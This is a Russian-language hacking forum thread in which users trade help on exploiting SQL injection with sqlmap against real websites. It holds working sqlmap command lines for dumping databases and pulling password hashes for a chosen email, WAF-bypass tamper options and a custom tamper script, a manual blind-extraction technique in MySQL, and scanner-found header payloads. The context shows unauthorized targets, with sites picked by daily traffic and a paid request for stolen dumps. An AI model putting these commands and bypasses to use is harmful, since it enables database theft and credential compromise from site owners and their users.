Апосля сдачи его закрывают уафом или ипсами там всякими, ну и какие у тебя шансы пробить после этого?
И учти я не говорю ничего про "спалят", работу скульмапа легко замаскировать, я говорю про возможность провести реальный хак на скульмапе, вернее найти уязвимость при помощи оного.
НО если есть уязвимость, то вытянуть скульмапом канешн проще, особенно блайнд-инъекцию, но если она есть её и руками можно вытянуть вообще без никакова инструмента, вгетом отдним, НО вопрос то в уязвимости! Саммая проблема- как её найти, реализовать хак это уже пустяк и порой даже не интересно.
panic.ker
09.12.2018, 18:24
Sqlmap это изначально инструмент для автоматизации рутинных действий. Речи не велось по поводу "обнаружить им уязвимость" или проводить полноценный пентест с его помощью (с чем он кстати тоже вполне себе справляется). Исключительно раскерутить, автоматизировать. Для ПОИСКА есть руки, нестандартное мышление и Burp Suite + куча других вспомогательных инструментов.
0-day уязвимости находятся не так, и не автоматизированными программами, и не анализаторами исходного кода (они просто так же упрощают рутину). Речь идет об ЭКСПЛУАТАЦИИ найденной уязвимости, а не об обнаружении. С чем он и справляется на ура (и что является его основной задачей).
Одэи находятся каждый день пачками, и даже не одеи, а просто старые известные баги, пропущенные твоими крутыми спецами, разрабами и специализированными фирмами с крутыми пентестами. Лол.
Посмотри за сегодня
https://hackerone.com/hacktivity?so...tivity_at&filter=type:all&querystring=&page=1 (https://hackerone.com/hacktivity?sort_type=latest_disclosable_activity_a t&filter=type%3Aall&querystring=&page=1)
посмотри на вознаграждения (на моей памяти были выплаты и по 25-50к $), посмотри на корпорации, которые за это платят. А теперь задай сам себе вопрос, какие шансы пробить? =) Исключительно ОГРОМНЫЕ.
Далее, возможность провести реальный хак на скьюлмапе? Высочайшая. Но не основоваясь на sqlmap'e, а используя его в качестве вспомогательного инструмента, не основного для обнаружения уязвимости, повторюсь, ищут баги не так и не им. Когда уязвимость найдена - остальное дело техники. SQLMAP это не Web Application Security Scanner ! Он не обладает достаточной базой и возможностями для этого, т.к. не его предназначение. Это как обычную проксю на локалхосте полноценным фаерволлом назвать, цирк! Так что ты дядя аптекарь, изначально все попутал, и добил еще вишенкой, перепутав теплое с мягким. Повеселил и продолжаешь себя шутом выставлять.
msk_smail
09.12.2018, 19:30
Estet said:
↑ (https://antichat.live/posts/4267300/)
Подскажите. Вообщем дампится таблица, в колонке email, считал как emaiq (q - не подтвержденный символ)
Соответственно эту колонку он вообще не сдампил, пропустил, так же еще одну last name извлек не корректно и пропустил.
Что теперь можно сделать? Я так понял нельзя запустить на отдельную проверку не правильно извлеченных символов. Только запускать повторно?
Отдельно не получится , через — fresh- session , no-cast или hex + tamper - и все будет
panic.ker said:
↑ (https://antichat.live/posts/4267383/)
посмотри на вознаграждения (на моей памяти были выплаты и по 25-50к $), посмотри на корпорации, которые за это платят. А теперь задай сам себе вопрос, какие шансы пробить? =) Исключительно ОГРОМНЫЕ
Я не понимаю о чем мы спорим?
Скульмап не нужен, ты я вижу сам признаешь что уязвимость с ним не найти, поэтому он не нужен, а если уязвимость уже найдена, то скульмап УЖЕ не нужен, продавай иё за 50к $ и хлопай себя по яйцам.
Ты кстати много продал?
panic.ker said:
↑ (https://antichat.live/posts/4267383/)
Web Application Security Scanner ! Он не обладает достаточной базой и возможностями для этого
Да и расскажи нам что это Web Application Security Scanner? Как он работает? и что ты подразумеваешь под "достаточной базой"
panic.ker said:
↑ (https://antichat.live/posts/4267347/)
А теперь посмотри, на отчеты за последние 10 дней, на самых "современных" сервисах, где обнаружены sql-inj:
https://vulners.com/search?query=sql injection last 10 days (https://vulners.com/search?query=sql%20injection%20last%2010%20days)
Чем это все крутилось, как ты думаешь?
посмотрел 1 -й Netsparker, второй эксплоит не пейтоне? Где тут скульмап присутствует?
Ты ссылки проверяешь когда ими тычешь?
panic.ker
09.12.2018, 20:33
artkar. Ты...эт пиздец...
Sqlmap просто необходим, а не ненужен. Если у тебя time - based or boolean based иньекция blind, тебе надо вытянуть скажем хэши админов, в хэше 32 символа, на поиск одного верного символа уходит допустим 3-5 запросов к бд. Неверные символы возвращают ответ через 1 секунду, верный через 2. В базе скажем 5 хэшей. У тебя руками неделя уйдет, еще и сидеть с секундомером в руках. А если хэшей 50, 500, 5 000, 50 000 ~ ? Скажешь, напишешь скрипт? Пиши еще неделю, замусори логи тестами скрипта, пока уязвимость не закроют и не спалят. А тут есть готовый инструмент, это sqlmap. Человеку это физически невозможно сделать руками. Это один из возможных примеров, из сотен возможных.
https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools вот тебе список всех актуальных и не очень Web Application Security Scanner's , раз ума не хватает загуглить. Что это и для чего, разбирайся сам. Заметь, среди них нет sqlmap'a. Потому что, бык ты, это не сканер уязвимостей. По ссылке https://vulners.com/search?query=sql injection last 10 days я указал тебе последние найденные уязвимости в "современных" сервисах (проверенных продвинутыми пентестами еще до релиза продукта), которые взламываются с помощью sqlmap. Эксплуатируются им, дебил. А netsparker это адвизор баги блядь, именно в этом случае. Нашли они ее, а эксплуатирует ее sqlmap.
И да, иди на***. Тупой еще и спорить пытается, в чем не соображает нихера. На этом разговор с тобой окончен.
Как исключить директорию сайта при --crawl ? То есть , допустим , я хочу чекнуть все страницы сайта , кроме страниц из директории forum . Можно ли ее исключить ?
Lazy said:
↑ (https://antichat.live/posts/4272058/)
Как исключить директорию сайта при --crawl ? То есть , допустим , я хочу чекнуть все страницы сайта , кроме страниц из директории forum . Можно ли ее исключить ?
--crawl-exclude=.. Regexp to exclude pages from crawling (e.g. "logout")
Доброго времени суток постояльцы! Интересен такой вопрос, какие опции дать sqlmap, что бы проверил на уязвимость линк такого формата, без цели после слеша - ( /xxxxx.com/scart/ (http://www.xxxxx.com/scart/) )?
karkajoi
25.12.2018, 18:46
aZohan said:
↑ (https://antichat.live/posts/4272291/)
Доброго времени суток постояльцы! Интересен такой вопрос, какие опции дать sqlmap, что бы проверил на уязвимость линк такого формата, без цели после слеша - ( /
xxxxx.com/scart/ (http://www.xxxxx.com/scart/)
)?
--url "link.com/search/*" --dbs
joelblack
25.12.2018, 18:48
https://github.com/sqlmapproject/sqlmap/wiki/Usage#arbitrary-injection-point
ребят подскажите плз почему я в openfire не могу создать компонент или имя домена с символом _
servercomponent проходит а server_component нет
Вопрос: как при помощи sqlmap сделать из запроса SELECT password FROM a.user
(Где password фильтруется WAF) запрос вида SELECT 0x70617373776F7264 FROM a.user
xmp said:
↑ (https://antichat.live/posts/4272330/)
Вопрос: как при помощи sqlmap сделать из запроса SELECT password FROM a.user
(Где password фильтруется WAF) запрос вида SELECT 0x66 FROM a.user
"SELECT 0x66 FROM a.user" так не получится, просто заселектиш строку
смотря что за запрос, но это в любом случае отдельный скрипт писать придется
если знаешь количество колонок в a.user то можно что то около того бинарным перебором сделать
Code:
mysql> select 'true' from(select 1)x where 'aocalhost'>'localhost';
Empty set (0.00 sec)
mysql> select 'true' from(select 1)x where 'qocalhost'>'localhost';
+------+
| true |
+------+
| true |
+------+
1 row in set (0.00 sec)
на примере mysql.user, первая колонка в этой таблице "Host"
Code:
mysql> select 'true' from(select 1)x where ('aocalhost',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45) > (select * from mysql.user limit 1);
Empty set (0.01 sec)
mysql> select 'true' from(select 1)x where ('qocalhost',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39,40,41,42,43,44,45) > (select * from mysql.user limit 1);
+------+
| true |
+------+
| true |
+------+
1 row in set (0.01 sec)
Как сливать базу с конца ?
И ещё
Знаю почту как чтобы всё не сливать вытащить хеш от этой почты ?
Sensoft said:
↑ (https://antichat.live/posts/4273705/)
Как сливать базу с конца ?
--start --stop
Sensoft said:
↑ (https://antichat.live/posts/4273717/)
И ещё
Знаю почту как чтобы всё не сливать вытащить хеш от этой почты ?
1)--sql-shell
2)SELECT * FROM table_name WHERE email="email@email.com (mailto:email@email.com)";
Sensoft said:
↑ (https://antichat.live/posts/4273717/)
И ещё
Знаю почту как чтобы всё не сливать вытащить хеш от этой почты ?
--where="email='mail@mail'"
Доброго времени суток. Подскажите как правильно "скормить" ссылку в sqlmap.
Сканер выдал такие данные:
This vulnerability affects /blog/adaptive-learning/ (https://antichat.live/file_/C_/ProgramData/Acunetix_20WVS_2010/Data/Reporter/ReportItemTemp.xml/).
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
HTTP Header input Client-IP was set to (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
И Header вот такой:
GET /blog/adaptive-learning/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
X-Requested-With: XMLHttpRequest
vladF said:
↑ (https://antichat.live/posts/4277026/)
Доброго времени суток. Подскажите как правильно "скормить" ссылку в sqlmap.
Сканер выдал такие данные:
This vulnerability affects
/blog/adaptive-learning/ (https://antichat.live/file_/C_/ProgramData/Acunetix_20WVS_2010/Data/Reporter/ReportItemTemp.xml/)
.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
HTTP Header input
Client-IP
was set to
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
И Header вот такой:
GET /blog/adaptive-learning/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
X-Requested-With: XMLHttpRequest
Code:
-u https://site.ru/ --headers="Client-IP: *" --dbms=mysql --random-agent --level=3 --risk=3 --dbs
Ребят помогите, как правильно соединиться с сервером?
Что должно быть в new xmpp.Router()
/////////////////////////////////////////////////////////////
var xmpp = require('node-xmpp')
let s2s =new xmpp.Router()
s2s.register('test.servers', function (stanza) {
})
////////////////////////////////////////////////////////////
Пишу Так
-------------------------------------------
var xmpp = require('node-xmpp')
let s2s = new xmpp.Router({
host: 'localhost',
port: 5269,
})
s2s.register('test.servers', function (stanza) {
})
-------------------------------------------
Выдает
------------------------------------------------------------------------
Unhandled rejection TypeError: xmpp.Router is not a constructor
------------------------------------------------------------------------
В чем проблема???
Zabiyaka1
22.01.2019, 01:22
Всем привет. Скажите как через SQLmap напрямую подключиться к БД Oracle.Пакеты необходимые установила... Но вожу команду подключения вида:
-d oracle://***Password@IP: PORT/dbname/
Но SQlmap выдает
[INFO] testing Oracle
[INFO] confirming Oracle
[INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
Если добавит --dbms то выдает, следующее
[WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[INFO] fetching current database
[WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[[WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
INFO] fetching database (schema) names
[INFO] falling back to current database
[INFO] fetching current database
[CRITICAL] unable to retrieve the database names
Что не делаю не так, и возможно ли вообще подключиться в данном случае??
karkajoi
23.01.2019, 14:47
Zabiyaka1 said:
↑ (https://antichat.live/posts/4279119/)
Всем привет. Скажите как через SQLmap напрямую подключиться к БД Oracle.Пакеты необходимые установила... Но вожу команду подключения вида:
-d oracle://***Password@IP: PORT/dbname/
Но SQlmap выдает
[INFO] testing Oracle
[INFO] confirming Oracle
[INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
Если добавит --dbms то выдает, следующее
[WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[INFO] fetching current database
[WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[[WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
INFO] fetching database (schema) names
[INFO] falling back to current database
[INFO] fetching current database
[CRITICAL] unable to retrieve the database names
Что не делаю не так, и возможно ли вообще подключиться в данном случае??
-d oraclel://test:123@127.0.0.1:3306/имябазы
[CRITICAL] unable to retrieve the database names
не может получить имя базы данных
Пробуй --no-cast или --hex
Другими словами мапа не может понять к чему ей подключатся.
То есть тебе надо узнать имя бд для начала
Доброй ночи
Несколько вопросов:
1. Выводит колонку password как none, извлекает именно слово none посимвольно, в каждой строке. Как такое может быть? Можно ли что-то сделать?
2. Бывает извлекает пасы как или еще что-нибудь подобное, hex и nocast не помогает, это какая-то защита стоит я так понимаю, только тамперы подбирать?
3. Глупый вопрос, как определить текущую базу данных. Раскручиваешь скулю, там куча баз данных, бывает допустим sitename, sitenamedb, test_sitename и прочие в куче. Как определить текущую/рабочую? думал это curent-db, но с этой командой он просто извлекает таблицы всех баз подряд.
Спасибо за помощь
Estet said:
↑ (https://antichat.live/posts/4280018/)
Доброй ночи
Несколько вопросов:
1. Выводит колонку password как none, извлекает именно слово none посимвольно, в каждой строке. Как такое может быть? Можно ли что-то сделать?
2. Бывает извлекает пасы как или еще что-нибудь подобное, hex и nocast не помогает, это какая-то защита стоит я так понимаю, только тамперы подбирать?
3. Глупый вопрос, как определить текущую базу данных. Раскручиваешь скулю, там куча баз данных, бывает допустим sitename, sitenamedb, test_sitename и прочие в куче. Как определить текущую/рабочую? думал это curent-db, но с этой командой он просто извлекает таблицы всех баз подряд.
Спасибо за помощь
есть очень годный совет, правда большинство будет кидать камнями когда его услышит. если скуль ставит палки в колеса - бросай велик и крути скуль пешком
Estet said:
↑ (https://antichat.live/posts/4280035/)
не всем и не всегда подходит ваш совет, у меня исключительный случай. Но в целом я согласен!
вынужден не согласится мой совет не подойдет только при описании конкретного инъекта с определенными проблемами. в данном случае(и похожих) он вполне подходит
Estet said:
↑ (https://antichat.live/posts/4280043/)
вы меня не поняли, я не инъект подразумевал, а жизненную ситуацию, если так можно выразиться)
Кто-то изучает эту тему, вникает, ему интересно, а кто-то делает это исключительно для извлечения финансовой выгоды, и сидеть месяцами изучать банально нет возможностей, времени и т.д.
Нужно выполнить определенный этап работы, и возникают вот такие точечные вопросы, на которые нужен ответ здесь и сейчас)
Извиняюсь, что засоряю форум своими вопросами, если что, но увы в 19 году везде (на всех форумах) сидят одни профи, которые либо шлют тебя крутить ручками, либо шлют еще дальше. Почитайте первые страницы этой ветки и вы увидите на какие глупые вопросы давались ответы без проблем, а сейчас уже всем лень)
уу много букв, не осилил
Estet said:
↑ (https://antichat.live/posts/4280048/)
А вы еще отправляете меня ручками крутить xD Много действий, не осилю
так и смысл тогда ? я смотрю вы неплохо словоблудите, это ваша стихия
t0ma5 said:
↑ (https://antichat.live/posts/4280050/)
так и смысл тогда
? я смотрю вы неплохо словоблудите, это ваша стихия
У меня много талантов
Estet said:
↑ (https://antichat.live/posts/4280052/)
У меня много талантов
охотно верю
Code:
1. Выводит колонку password как none, извлекает именно слово none посимвольно, в каждой строке. Как такое может быть? Можно ли что-то сделать?
2. Бывает извлекает пасы как или еще что-нибудь подобное, hex и nocast не помогает, это какая-то защита стоит я так понимаю, только тамперы подбирать?
3. Глупый вопрос, как определить текущую базу данных. Раскручиваешь скулю, там куча баз данных, бывает допустим sitename, sitenamedb, test_sitename и прочие в куче. Как определить текущую/рабочую? думал это curent-db, но с этой командой он просто извлекает таблицы всех баз подряд.
это, извиняюсь, ерунда
1. - то что выводит sqlmap сугубо его дела, признаюсь лезть в многокиловый питоновский код, чтобы ответить на ваш вопрос, у меня желания нет
2. - может быть что угодно, да может быть и waf "какая-то защита стоит я так понимаю". опять же, только ручной анализ поможет определить проблему и решение(если таковое существует)
3. - вот этот вопрос собвственно и сподвиг меня облачить шпагу. как можно не знать как узнать текущую БД
ваш нужно сейчас, просто и быстро нужна информация. хм, возможно тут найдутся люди которые помогут, сорь что потратил ваше время
t0ma5 said:
↑ (https://antichat.live/posts/4280056/)
это, извиняюсь, ерунда
1. - то что выводит sqlmap сугубо его дела, признаюсь лезть в многокиловый питоновский код, чтобы ответить на ваш вопрос, у меня желания нет
2. - может быть что угодно, да может быть и waf "какая-то защита стоит я так понимаю". опять же, только ручной анализ поможет определить проблему и решение(если таковое существует)
3. - вот этот вопрос собвственно и сподвиг меня облачить шпагу. как можно не знать как узнать текущую БД
ваш нужно сейчас, просто и быстро нужна информация. хм, возможно тут найдутся люди которые помогут, сорь что потратил ваше время
благодарствую
prpuservice
28.01.2019, 23:57
приветствую всех , подскажите пожалуйста как оставить дамп в мапе , и чтобы он сохранил остаток , и потом при следующем запуске , начал с того же места.
karkajoi
29.01.2019, 00:20
prpuservice said:
↑ (https://antichat.live/posts/4280748/)
приветствую всех , подскажите пожалуйста как оставить дамп в мапе , и чтобы он сохранил остаток , и потом при следующем запуске , начал с того же места.
cntrl+C,мапа сохраняет лог дампа, при след. запуске она продолжит с места остановки.
prpuservice
30.01.2019, 01:10
Ребята доброй ночи , подскажите в чем проблема sqlmap льет пустые строки https://i.ibb.co/BjhkG9Y/1.png , хотя когда лью jsql , то он сливает данные , а мап нет (
karkajoi
30.01.2019, 01:16
prpuservice said:
↑ (https://antichat.live/posts/4281025/)
Ребята доброй ночи , подскажите в чем проблема sqlmap льет пустые строки
https://i.ibb.co/BjhkG9Y/1.png
, хотя когда лью jsql , то он сливает данные , а мап нет (
попробуй --hex
prpuservice
30.01.2019, 01:24
karkajoi said:
↑ (https://antichat.live/posts/4281027/)
попробуй --hex
https://i.ibb.co/DQK5wcv/image.png вот так у меня все прописано ,попробовал с --hex , не прокатывает
karkajoi
30.01.2019, 01:31
prpuservice said:
↑ (https://antichat.live/posts/4281030/)
https://i.ibb.co/DQK5wcv/image.png
вот так у меня все прописано ,попробовал с --hex , не прокатывает
тамперы пробовал? и еще по пробуй меньше дамп сделать, то есть одну колонку например
prpuservice
30.01.2019, 01:32
karkajoi said:
↑ (https://antichat.live/posts/4281031/)
тамперы пробовал?
нет
prpuservice said:
↑ (https://antichat.live/posts/4281025/)
Ребята доброй ночи , подскажите в чем проблема sqlmap льет пустые строки
https://i.ibb.co/BjhkG9Y/1.png
, хотя когда лью jsql , то он сливает данные , а мап нет (
--hex добавь часто помогает
prpuservice
30.01.2019, 01:39
Sensoft said:
↑ (https://antichat.live/posts/4281033/)
--hex добавь часто помогает
не прокатывает
karkajoi
30.01.2019, 01:47
prpuservice said:
↑ (https://antichat.live/posts/4281035/)
не прокатывает
по попробуй одну строку вывести, возможно сильно длинный запрос
prpuservice
30.01.2019, 01:53
karkajoi said:
↑ (https://antichat.live/posts/4281036/)
по попробуй одну строку вывести, возможно сильно длинный запрос
Возможно есть такое , а что делать с этим ?
prpuservice
30.01.2019, 01:58
karkajoi said:
↑ (https://antichat.live/posts/4281036/)
по попробуй одну строку вывести, возможно сильно длинный запрос
https://i.ibb.co/L59dw6s/image.png jsql вот , все льет норм
karkajoi
30.01.2019, 02:02
prpuservice said:
↑ (https://antichat.live/posts/4281040/)
https://i.ibb.co/L59dw6s/image.png
jsql вот , все льет норм
вот тут не знаю, можно все частями выводить, а потом слепить. с таким сталкивался , так и не рашил(
prpuservice
30.01.2019, 02:02
karkajoi said:
↑ (https://antichat.live/posts/4281041/)
вот тут не знаю, можно все частями выводить, а потом слепить. с таким сталкивался , так и не рашил(
Факт в том , что мап вообще ничего не выводит с данного сайта
karkajoi
30.01.2019, 02:17
prpuservice said:
↑ (https://antichat.live/posts/4281042/)
Факт в том , что мап вообще ничего не выводит с данного сайта
и такое бывает, мапа это не 100 процентный инструмент, но она хороша, тогда либо руками, либо софту которая выводит искать надо
prpuservice
30.01.2019, 02:22
karkajoi said:
↑ (https://antichat.live/posts/4281043/)
и такое бывает, мапа это не 100 процентный инструмент, но она хороша, тогда либо руками, либо софту которая выводит искать надо
Спасибо помощь , а не посоветуешь софты ? какими можно будет слить
karkajoi
30.01.2019, 03:06
prpuservice said:
↑ (https://antichat.live/posts/4281044/)
Спасибо помощь , а не посоветуешь софты ? какими можно будет слить
не не знаю, либо мапа, либо руками
prpuservice
31.01.2019, 00:07
man474019 said:
↑ (https://antichat.live/posts/4281061/)
Hi
Try --hex, --no-cast options and different tamper scripts + play with --time-sec & --delay or TOR on/off
dont work
просканировал сайт командой --random-agent -u сайт --form --crawl=2 –-level=5 –-risk=3 --batch
sqlmap нашел уязвимость POST
помогите раскрутить
http://prntscr.com/mkhi5z
посещалка 10к в день
BillyBons
13.02.2019, 15:12
m0nkrus said:
↑ (https://antichat.live/posts/4284579/)
просканировал сайт командой --random-agent -u сайт --form --crawl=2 –-level=5 –-risk=3 --batch
sqlmap нашел уязвимость POST
помогите раскрутить
http://prntscr.com/mkhi5z
посещалка 10к в день
--dbs ? или чем конкретно помочь ? подробности будут ?
BillyBons said:
↑ (https://antichat.live/posts/4284591/)
--dbs ? или чем конкретно помочь ? подробности будут ?
http://prntscr.com/mkhxqw
BillyBons
13.02.2019, 15:17
m0nkrus said:
↑ (https://antichat.live/posts/4284592/)
http://prntscr.com/mkhxqw
curl -X POST --data="Payload(со скриншота)" ссылка что выдает ?
panic.ker
13.02.2019, 17:02
m0nkrus said:
↑ (https://antichat.live/posts/4284592/)
http://prntscr.com/mkhxqw
Руками посмотри стринг, который выдается при true, и выбери (s) вбив его. А вообще все верно выше написали, запускай с параметром --dbs и на этом этапе просто (C) каждый раз. У тебя параметр email= пустой, заполни его чем то изначально, test@test.com (mailto:test@test.com) например, не чекай с пустыми параметрами.
http://prntscr.com/mmaytz
это уязвимость?
BillyBons said:
↑ (https://antichat.live/posts/4284593/)
curl -X POST --data="Payload(со скриншота)" ссылка что выдает ?
слепая SQL была(((
m0nkrus said:
↑ (https://antichat.live/posts/4286094/)
http://prntscr.com/mmaytz
это уязвимость?
неть
как раскрутить ?
http://prntscr.com/mmibtn
посещалка 6500 в день
m0nkrus said:
↑ (https://antichat.live/posts/4286226/)
как раскрутить ?
http://prntscr.com/mmibtn
посещалка 6500 в день
руками
https://github.com/sqlmapproject/sqlmap/wiki/Usage
Срочно ищу помощника (ру), требуются дампы
Оплата достойная
Telegram
S_O_Group
всем привет
помогите плз разобраться
sqlmap --url "https://www.******.com/***/****/*******/********a-100-ml.html?query=query+AND+1=1+--+ (https://www.******.com/***/****/*******/********a-100-ml.html?query=query+AND+1%3D1+--+)" --dbs --random-agent --technique=BEUQ --tamper=space2comment.py --level=3 --risk=3
___
__H__
___ ___[']_____ ___ ___ {1.3.2#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
starting @ 20:41:22 /2019-03-12/
[20:41:22] [INFO] loading tamper module 'space2comment'
[20:41:22] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11' from file '/usr/share/sqlmap/txt/user-agents.txt'
[20:41:22] [WARNING] it appears that you have provided tainted parameter values ('query=query AND 1%3D1 -- ') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[20:41:29] [INFO] testing connection to the target URL
[20:41:44] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
[20:41:44] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:41:51] [INFO] testing if the target URL content is stable
[20:41:55] [INFO] target URL content is stable
[20:41:55] [INFO] testing if GET parameter 'query' is dynamic
[20:42:02] [WARNING] GET parameter 'query' does not appear to be dynamic
[20:42:52] [WARNING] heuristic (basic) test shows that GET parameter 'query' might not be injectable
[20:43:00] [INFO] testing for SQL injection on GET parameter 'query'
[20:43:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:43:23] [WARNING] turning off pre-connect mechanism because of connection reset(s)
[20:43:23] [WARNING] there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests
[20:43:23] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)
так понимаю надо темперы подбирать и time-sec увеличивать?
karkajoi
13.03.2019, 00:21
EricZ said:
↑ (https://antichat.live/posts/4292274/)
всем привет
помогите плз разобраться
sqlmap --url "
https://www.******.com/***/****/*******/********a-100-ml.html?query=query+AND+1=1+--+ (https://www.******.com/***/****/*******/********a-100-ml.html?query=query+AND+1%3D1+--+)
" --dbs --random-agent --technique=BEUQ --tamper=space2comment.py --level=3 --risk=3
___
__H__
___ ___[']_____ ___ ___ {1.3.2#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_|
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
starting @ 20:41:22 /2019-03-12/
[20:41:22] [INFO] loading tamper module 'space2comment'
[20:41:22] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11' from file '/usr/share/sqlmap/txt/user-agents.txt'
[20:41:22] [WARNING] it appears that you have provided tainted parameter values ('query=query AND 1%3D1 -- ') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[20:41:29] [INFO] testing connection to the target URL
[20:41:44] [WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
[20:41:44] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:41:51] [INFO] testing if the target URL content is stable
[20:41:55] [INFO] target URL content is stable
[20:41:55] [INFO] testing if GET parameter 'query' is dynamic
[20:42:02] [WARNING] GET parameter 'query' does not appear to be dynamic
[20:42:52] [WARNING] heuristic (basic) test shows that GET parameter 'query' might not be injectable
[20:43:00] [INFO] testing for SQL injection on GET parameter 'query'
[20:43:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:43:23] [WARNING] turning off pre-connect mechanism because of connection reset(s)
[20:43:23] [WARNING] there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests
[20:43:23] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)
так понимаю надо темперы подбирать и time-sec увеличивать?
По пробуй вот так https://www.******.com/***/****/*******/********a-100-ml.html?query= (https://www.%2A%2A%2A%2A%2A%2A.com/***/****/*******/********a-100-ml.html?query=query+AND+1%3D1+--+)*"
+ подрубай прокси или Tor
BenderMR
18.03.2019, 10:08
Подкиньте название тампера для инжекта такого вида: target.com/index.php?id=4668' /*!50000uNiOn*/ /*!50000sElEcT*/ 'here', 1-- -.
Руками раскрутить проблемы нет, но не знаю как мапу скормить
BillyBons
18.03.2019, 11:13
BenderMR said:
↑ (https://antichat.live/posts/4293850/)
Подкиньте название тампера для инжекта такого вида: target.com/index.php?id=4668' /*!50000uNiOn*/ /*!50000sElEcT*/ 'here', 1-- -.
Руками раскрутить проблемы нет, но не знаю как мапу скормить
Навскидку нет,, посмотрите тут - https://0xd0m7.blogspot.com/2016/02/understanding-tamper-option-in-sqlmap-ii.html
или воспользуйтесь этим - https://www.kitploit.com/2018/10/atlas-quick-sqlmap-tamper-suggester.html
hibar1Xs
18.03.2019, 11:34
BenderMR said:
↑ (https://antichat.live/posts/4293850/)
Подкиньте название тампера для инжекта такого вида: target.com/index.php?id=4668' /*!50000uNiOn*/ /*!50000sElEcT*/ 'here', 1-- -.
Руками раскрутить проблемы нет, но не знаю как мапу скормить
В tamper/versionedkeywords.py где /*!%s*/ поменять на своё значение /*!12345%s*/
и использовать randomcase
--tamper=randomcase,versionedkeywords
BenderMR
19.03.2019, 06:39
hibar1Xs said:
↑ (https://antichat.live/posts/4293880/)
В tamper/versionedkeywords.py где
/*!%s*/
поменять на своё значение
/*!12345%s*/
и использовать
randomcase
--tamper=randomcase,versionedkeywords
Спасибо, то что нужно. А как расширить данный функционал для /*!50000information_schema*/.tables etc. Пробовал переписать немного этот тампер, но не вышло.
Может есть кто то делал подобные тамперы под informatio_schema?
winstrool
19.03.2019, 08:22
BenderMR said:
↑ (https://antichat.live/posts/4294126/)
Спасибо, то что нужно. А как расширить данный функционал для /*!50000information_schema*/.tables etc. Пробовал переписать немного этот тампер, но не вышло.
Может есть кто то делал подобные тамперы под informatio_schema?
Создаешь в папке с тампером новый файл, как пример:
Code:
#!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'
Requirement:
* MySQL
Tested against:
* MySQL 5.0
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that filter the CONCAT() function
>>> tamper('CONCAT(1,2)')
'CONCAT_WS(MID(CHAR(0),0,0),1,2)'%73CHEMA
"""
if payload:
payload = payload.replace("INFORMATION_SCHEMA.TABLES", "/*!12345%49NFORMATION_SCHEMA.TABLES*/")
